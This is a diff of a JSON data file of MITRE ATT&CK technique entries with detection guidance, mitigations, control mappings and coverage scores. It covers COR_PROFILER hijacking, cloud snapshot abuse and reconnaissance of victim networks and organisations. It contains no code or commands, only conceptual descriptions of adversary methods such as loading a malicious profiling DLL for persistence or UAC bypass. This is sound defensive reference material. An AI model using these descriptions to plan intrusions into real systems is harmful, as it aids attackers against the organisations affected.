-                "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)",
-                "detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.",
+                "tid": "T1590.006",
+                "name": "Gather Victim Network Information: Network Security Appliances",
+                "url": "https://attack.mitre.org/techniques/T1590/006",
+                "description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1024",
-                        "name": "Restrict Registry Permissions",
-                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                        "url": "https://attack.mitre.org/mitigations/M1024"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1013",
-                "name": "Application Developer Guidance",
-                "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
-                "url": "https://attack.mitre.org/mitigations/M1013"
-            },
-            {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
-            },
-            {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
-            },
-            {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
-            },
-            {
-                "mid": "M1044",
-                "name": "Restrict Library Loading",
-                "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.",
-                "url": "https://attack.mitre.org/mitigations/M1044"
-            },
-            {
-                "mid": "M1024",
-                "name": "Restrict Registry Permissions",
-                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                "url": "https://attack.mitre.org/mitigations/M1024"
-            },
-            {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
-            },
-            {
-                "mid": "M1052",
-                "name": "User Account Control",
-                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
-                "url": "https://attack.mitre.org/mitigations/M1052"
-            },
-            {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.06904761904761905,
+        "adjusted_score": 0.06904761904761905,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "18.2",
+            "18.3"
+        ],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.01904761904761905,
+            "mitigation_score": 0.03636363636363636
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1590.001",
+        "name": "Gather Victim Network Information: Domain Properties",
+        "description": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+        "url": "https://attack.mitre.org/techniques/T1590/001",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1590",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.06904761904761905,
+        "adjusted_score": 0.06904761904761905,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "18.2",
+            "18.3"
+        ],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1590.002",
+        "name": "Gather Victim Network Information: DNS",
+        "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+        "url": "https://attack.mitre.org/techniques/T1590/002",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1590",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.06904761904761905,
+        "adjusted_score": 0.06904761904761905,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "18.2",
+            "18.3"
+        ],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1590.003",
+        "name": "Gather Victim Network Information: Network Trust Dependencies",
+        "description": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+        "url": "https://attack.mitre.org/techniques/T1590/003",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1590",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1590.004",
+        "name": "Gather Victim Network Information: Network Topology",
+        "description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+        "url": "https://attack.mitre.org/techniques/T1590/004",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1590",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 1.8261904761904764,
-        "adjusted_score": 1.8261904761904764,
-        "has_car": true,
-        "has_sigma": true,
-        "has_es_siem": true,
+        "cumulative_score": 0.07857142857142857,
+        "adjusted_score": 0.07857142857142857,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
         "has_splunk": true,
         "cis_controls": [
-            "2.5",
-            "2.6",
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.4",
-            "7.5",
-            "16.13",
-            "18.3",
-            "18.5"
+            "18.2",
+            "18.3"
         ],
-        "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-4",
-            "AC-5",
-            "AC-6",
-            "CA-7",
-            "CA-8",
-            "CM-2",
-            "CM-5",
-            "CM-6",
-            "CM-7",
-            "CM-8",
-            "IA-2",
-            "RA-5",
-            "SI-10",
-            "SI-2",
-            "SI-3",
-            "SI-4",
-            "SI-7"
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1590.005",
+        "name": "Gather Victim Network Information: IP Addresses",
+        "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+        "url": "https://attack.mitre.org/techniques/T1590/005",
+        "tactics": [
+            "Reconnaissance"
         ],
-        "process_coverage": true,
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1590",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.06904761904761905,
+        "adjusted_score": 0.06904761904761905,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "18.2",
+            "18.3"
+        ],
+        "nist_controls": [],
+        "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.47619047619047616,
-            "mitigation_score": 0.6545454545454545,
-            "detection_score": 0.28
-        },
-        "choke_point_score": 0.35,
-        "prevalence_score": 1
+        "hardware_coverage": false
     },
     {
-        "tid": "T1578",
-        "name": "Modify Cloud Compute Infrastructure",
-        "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)",
-        "url": "https://attack.mitre.org/techniques/T1578",
+        "tid": "T1590.006",
+        "name": "Gather Victim Network Information: Network Security Appliances",
+        "description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+        "url": "https://attack.mitre.org/techniques/T1590/006",
         "tactics": [
-            "Defense Evasion"
+            "Reconnaissance"
         ],
-        "detection": "Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
         "platforms": [
-            "IaaS"
+            "PRE"
         ],
-        "data_sources": [
-            "Instance: Instance Creation",
-            "Instance: Instance Deletion",
-            "Instance: Instance Modification",
-            "Instance: Instance Start",
-            "Instance: Instance Stop",
-            "Snapshot: Snapshot Creation",
-            "Snapshot: Snapshot Deletion",
-            "Snapshot: Snapshot Modification",
-            "Volume: Volume Creation",
-            "Volume: Volume Deletion",
-            "Volume: Volume Modification"
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1590",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.06904761904761905,
+        "adjusted_score": 0.06904761904761905,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "18.2",
+            "18.3"
+        ],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1591",
+        "name": "Gather Victim Org Information",
+        "description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+        "url": "https://attack.mitre.org/techniques/T1591",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
         ],
+        "data_sources": [],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1578.001",
-                "name": "Modify Cloud Compute Infrastructure: Create Snapshot",
-                "url": "https://attack.mitre.org/techniques/T1578/001",
-                "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)",
-                "detection": "The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.\n\nIn AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).\n\nIn Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)\n\nGoogle's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the \"sourceSnapshot\": parameter pointed to \"global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
+                "tid": "T1591.001",
+                "name": "Gather Victim Org Information: Determine Physical Locations",
+                "url": "https://attack.mitre.org/techniques/T1591/001",
+                "description": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                "mitigations": [
                     {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1578.002",
-                "name": "Modify Cloud Compute Infrastructure: Create Cloud Instance",
-                "url": "https://attack.mitre.org/techniques/T1578/002",
-                "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.",
-                "detection": "The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)",
+                "tid": "T1591.002",
+                "name": "Gather Victim Org Information: Business Relationships",
+                "url": "https://attack.mitre.org/techniques/T1591/002",
